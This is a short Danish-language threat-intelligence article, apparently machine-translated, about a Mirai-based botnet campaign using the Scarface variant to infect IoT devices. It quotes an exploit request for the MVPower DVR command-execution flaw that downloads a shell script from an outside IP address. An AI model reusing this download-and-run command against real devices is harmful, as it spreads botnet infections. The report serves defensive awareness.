Scarface Botnet
Når en malware-trussel får sin kildekode enten lækket eller frigivet til offentligheden af udviklerne selv, tillader det selv ikke-så-erfarne trusselsaktører at tage det, foretage justeringer, der passer til deres behov bedre og frigøre det i naturen. Denne nøjagtige adfærd er blevet opdaget flere gange siden koden for det berygtede Mirai Botnet blev offentliggjort på hackerfora tilbage i 2016.
En trusselsaktør, der identificerer sig selv som Prioritet, står bag en angrebskampagne, der involverer to forskellige Mirai-varianter. Den første nyttelast, den anvendte, var baseret på Demonbot Mirai-varianten, og den fokuserede specifikt på Hadoop-angreb. Den anden nyttelast, der blev vedtaget senere i kampagnen, er langt mere avanceret, og den er baseret på Mirai-varianten udviklet af Scarface. Scarface er en kendt malwareudvikler, der tog Mirai-koden og forsøgte at gøre den tilgængelig for nybegyndte hackere lettere, samtidig med at den skræddersy truslen om at inficere Internet of Things (IoT) -enheder.
Prioritetskampagnen fokuserer på at scanne efter flere porte - 500, 5501, 5502, 5050 og 60001 og angribe dem med en enkelt kommando med 'GET / shell? Cd% 20 / tmp;% 20wget% 20http: // 45 ( .) 13.58.4 / TPJ.sh; kommando. Ifølge de infosec-analytikere, der analyserede Priority-kampagnen, ser angriberen ud til at have et specifikt mål i tankerne, fordi den målretter mod 60001-porten, mens de andre fire tjener mere som en distraktion end noget andet. Derudover besluttede de, at Prioritet skal være ret uerfaren, hvilket fremgår af det faktum, at kun en enkelt sårbarhed blev udnyttet som en kompromisvektor - MVPower DVR Shell Uautentiseret kommandoudførelse i stedet for den sædvanlige mængde på mellem 3 og 7 udnyttelser fundet i andre lignende trusler.
Alle de første angreb blev lanceret af en enkelt IP-adresse hostet på en Virtual Private Server (VPS) leveret af Digital Ocean. Hackere tyr ofte til VPS på grund af den fleksibilitet, de giver, ved hurtigt at oprette en server og derefter rense den lige så hurtigt.